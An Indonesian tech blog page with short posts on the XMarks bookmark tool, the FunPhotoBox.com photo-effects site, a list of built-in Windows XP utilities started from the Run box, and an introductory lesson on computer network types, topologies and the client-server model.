Jika anda sering memakai beberapa komputer dalam pekerjaan anda, anda harus mencoba menggunakan XMarks. Namun, para pengguna Opera tidak dapat menggunakan XMarks, karena aplikasi ini hanya dapat digunakan untuk Firefox, Internet Explorer, Chrome, dan Safari saja.
Read More

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Tips Memberikan Efek ke Foto Dengan FunPhotoBox.com

Memberikan Berbagai Macam Efek ke Foto Dengan FunPhotoBox.com


Kita dapat menemukan banyak sekali website yang dapat menghibur serta cukup bermanfaat bagi kita. FunPhotoBox.com adalah salah satu dari website semacam itu. Di FunPhotoBox.com, kita dapat memberikan berbagai macam efek kepada foto kita. Contohnya, kita dapat membuat foto kita seakan-akan terpampang di papan iklan, di langit, di majalah, dan sebagainya. Kita juga dapat menambahkan animasi kepada foto kita. Foto yang telah diedit dapat menjadi pajangan yang menarik untuk profil kita di website social networking, atau menjadi wallpaper untuk desktop kita karena FunPhotoBox.com dapat menghasilkan hasil edit foto dengan resolusi yang cukup baik.

Di FunPhotoBox.com, ada berbagai macam efek yang dapat kita pilih, yaitu face effects, photo effects, animations cards, dan magazines. Ada beberapa langkah yang perlu kita lakukan untuk mengedit foto kita di FunPhotoBox.com. Pertama-tama, kita memilih efek mana yang kita inginkan. Kemudian, kita unggah foto kita. Kita dapat mengunggah foto kita dari komputer, mengambil dari webcam, atau mengambil foto yang sudah kita unggah (bisa di photobucket, website kita sendiri, dsb) dengan memasukkan url foto tersebut. Setelah foto berhasil kita unggah, kita akan sampai pada layar dimana kita dapat menentukan area dari foto kita yang ingin kita beri efek. Setelah kita menentukan area dari foto kita yang ingin kita beri efek dan mengklik tombol GO, kita akan segera mendapatkan hasilnya.

Setelah kita mendapatkan hasil edit yang dilakukan oleh FunPhotoBox.com, kita dapat langsung menyimpannya di komputer kita, melakukan publish & share, atau mencoba mengedit foto tadi dengan efek lain.

Memberikan berbagai macam efek kepada foto memang sangat menyenangkan, khususnya bagi orang-orang yang suka memamerkan foto mereka dan ingin terlihat unik. Selamat mencoba!

 KLIK Disini  Biar Langsung peraktek
Read More

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Tips BEBERAPA APLIKASI RAHASIA PADA WINDOWS XP

BEBERAPA APLIKASI RAHASIA PADA WINDOWS XP


Berikut ini beberapa aplikasi rahasia yang ada pada Windows XP. Sebagian aplikasi mungkin sudah kita kenal sebelumnya namun ada beberapa aplikasi yang mungkin asing dan baru bagi kita. Aplikas-aplikasi tersebut dapat kita gunakan untuk melakukan optimasi dan monitoring system Windows XP kita.


Beberapa aplikasi dimaksud adalah sebagai berikut.


1. Disk Cleanup = cleanmgr.exe


Digunakan untuk cleanup disk


2. Character Map = charmap.exe

Digunakan untuk mencari karakter yang tidak umum


3. Dr Watson = drwtsn32.exe

Digunakan untuk troubleshooting di PC.


4. DirectX diagnosis = dxdiag.exe

Digunakan untuk diagnosis audio video card anda


5. Private character editor = eudcedit.exe

Digunakan untuk membuat karakter baru di windows anda


6. IExpress Wizard = iexpress.exe

Digunakan untuk membuat self-extracting / self-installing package. seperti file Zip


7. Microsoft Synchronization Manager = mobsync.exe

Digunakan untuk membuat sincronisasi.


8. Clipboard Viewer = clipbrd.exe

Digunakan untuk melihat konten dari Windows clipboard


9. Windows Media Player 5.1 = mplay32.exe

Digunakan untuk membuka Windows Media Player versi 5.1


10. ODBC Data Source Administrator = odbcad32.exe

Digunakan untuk keperluan database


11. Object Packager = packager.exe

Digunakan untuk memasukkan objek kedalam file.


12. System Configuration Editor = sysedit.exe

Digunakan untuk mengubah system.ini dan win.ini


13. Syskey = syskey.exe

Digunakan untuk konfigurasi account di windows.


14. Microsoft Telnet Client = telnet.exe

Digunakan untuk melakukan koneksi internet sebelum ada browser.


15. Driver Verifier Manager = verifier.exe

Digunakan untuk monitoring driver di windows anda


16. Windows for Workgroups Chat = winchat.exe

Digunakan untuk chat sec


17. System configuration = msconfig.exe

Digunakan untuk mengontrol program startup


18. System Monitor = perfmon.exe

Digunakan untuk memonitor PC anda.


19. Program Manager = progman.exe

Merupakan warisan dari Windows 3.x desktop shell


20. gpedit.msc

Digunakan untuk mengatur group policy dan otorisasi, apabila Anda menggunakan Active Directory.


21. Remote Access phone book = rasphone.exe

Merupakan aplikasi seperti buku telepon


22. Registry Editor = regedt32.exe [juga regedit.exe]

Digunakan untuk tweaking dan editing registry windows


23. Network shared folder wizard = shrpubw.exe

Digunakan untuk membuat shared folder dalam jaringan


24. File siganture verification tool = sigverif.exe

Digunakan untuk verifikasi signature


25. Volume Control = sndvol32.exe

Digunakan untuk menampilkan sound control di System Tray


Cara untuk menjalankan aplikasi-aplikasi tersebut adalah sebagai berikut.


Klik [Start]>[All Programs]>[Accessories]>[Command Prompt]


Atau


Klik [Start]>[Run]


Kemudian ketikkan perintah dengan menuliskan nama aplikasinya dan dilanjutkan dengan OK atau menekan ENTER. Kecuali gpedit.msc, dalam mengetikkan perintah, tidak perlu menuliskan nama aplikasinya dengan lengkap.


Contoh :


Jika kita ingin menjalankan MSCONFIG.EXE maka kita hanya dapat menuliskan (mengetikkan) MSCONFIG saja (tanpa diikuti .exe).


Semoga bermanfaat!
Read More

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Belajar Jaringan Komputer

Jaringan Komputer


1. Pengertian Jaringan Komputer

Menurut Dede Sopandi (2008 : 2) jaringan komputer adalah gabungan antara teknologi komputer dan teknologi telekomunikasi. Gabungan teknologi ini menghasilkan pengolahan data yang dapat didistribusikan, mencakup pemakaian database, software aplikasi dan peralatan hardware secara bersamaan.



1.1 Tipe – tipe Jaringan Komputer

Menurut Dede Sopandi dalam bukunya (2008 : 1-6) mengemukakan suatu jaringan komputer memiliki skop dan luasnya masing-masing, untuk itu secara geografis jaringan komputer dibedakan menjadi beberapa macam, sebagai berikut :


1. Local Area Network (LAN)

Local Area Network (LAN) adalah jaringan yang bersifat internal dan biasanya milik pribadi di dalam sebuah perusahaan kecil atau menengah dan biasanya berukuran sampai beberapa kilometer. LAN biasanya digunakan untuk menghubungkan komputer-komputer pribadi dan workstation dalam kantor suatu perusahaan untuk pemakaian sumber daya bersama, serta sarana untuk saling bertukar informasi.

2. Metropolitan Area network (MAN)

Metropolitan Area Network (MAN) adalah sebuah jaringan menggunakan teknologi yang sama dengan LAN, hanya ukurannya biasanya lebih luas dari pada LAN dan biasanya MAN dapat mencakup kantor-kantor perusahaan yang letaknya berdekatan atau antar sebuah kota dan dapat dimanfaatkan untuk keperluan pribadi atau umum. MAN pun mampu menunjang data dan suar, bahkan dapat berhubungan dengan jaringan televise kabel.

3. Wide Area Network (WAN)

Wide Area Network (WAN) adalah sebuah jaringan yang jangkauannya mencakup daerah geografis yang lebih luas, seringkali mencakup sebuah negara bahkan benua. WAN terdiri dari kumpulan LAN, MAN, dan mesin-mesin yang bertujuan untuk menjalankan program aplikasi pemakai.

4. Internet

Internet adalah kumpulan dari beberapa jenis jaringan yang berbeda LAN, WAN, atau keduanya mencakup seluruh dunia yang saling terkoneksi.


1.2 Tropologi Jaringan

Menurut Dede Sopandi dalam bukunya mengenai jaringan komputer (2008 : 27-32) Topologi jaringan adalah susunan atau pemetaan interkoneksi antara node, dari suatu jaringan, baik secara fisik (riil) dan logis (virtual). Topologi menggambarkan metode yang digunakan untuk melakukan pengabelan secara fisik dari suatu jaringan.


Topologi fisik jaringan adalah cara yang digunakan untuk menghubungkan workstation-workstation di dalam LAN tersebut. Macam-macam topologi jaringan fisik, antara lain :

1. Topologi Bus atau Linier

Topologi bus merupakan topologi yang banyak dipergunakan pada masa penggunaan kabel coaxial menjamur. Karakteristik topologi ini yaitu satu kabel yang kedua ujungnya ditutup dimana sepanjang kabel terdapat node-node, paling prevevalent karena sederhana dalam instalasi, signal melewati kabel 2 arah dan mungkin terjadi collision.


2. Topologi Ring

Topologi ring adalah topologi yang informasi dan data serta traffic disalurkan sedemikian rupa. Umumnya fasilitas ini memanfaatkan fiber optic sebagai sarananya. Karakteristik topologi ini yaitu lingkaran tertutup yang berisi node-node, sederhana dalam layout, signal mengalir dalam satu arah sehingga menghindarkan terjadinya collision.



3. Topologi Star

Topologi star merupakan topologi yang banyak digunakan diberbagai tempat, karena kemudahan untuk menambah, mengurangi, atau mendeteksi kerusakan jaringan yang ada. Karakteristik topologi ini yaitu setiap node berkomunikasi langsung dengan central node, traffic data mengalir dari node ke central node dan kembali lagi, mudah dikembangkan karena setiap node hanya memiliki kabel yang langsung terhubung ke central node, keunggulan jika satu kabel node terputus maka yang lainnya tidak akan terganggu.

4. Topologi tree

Topologi tree merupakan topologi jaringan dimana topologi ini merupakan gabungan atau kombinasi dari ketiga topologi yang ada yaitu topologi star, topologi ring, dan topologi bus.


1.3 Model Hubungan Client-Server

Menurut Agus Mulyanto (2009 : 41) mendefinisikan client-server sebagai arsitektur yang paling banyak digunakan saat ini. Dimana client dapat melakukan proses sendiri, ketika client meminta data, server akan mengirimkan data sesuai yang diminta, kemudian proses akan dilakukan di client. Arsitektur client-server memiliki kelebihan sebagai berikut :

1. Pemrosesan dapat dilakukan di computer client, sehingga data dapat diproses sesuai dengan kebutuhan client.

2. Proses bisnis tetap akan berjalan meskipun terjadi kemacetan mesin.

3. Pada arsitektur client-server hanya dibutuhkan mesin-mesin yang sederhana, sehingga dapat mengurangi biaya dalam membangun sistem.

4. Mudah dalam melakukan up-grade pada perangkat sistem.

5. Dapat menggunakan berbagai platform aplikasi pada client.
Read More

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Creation IT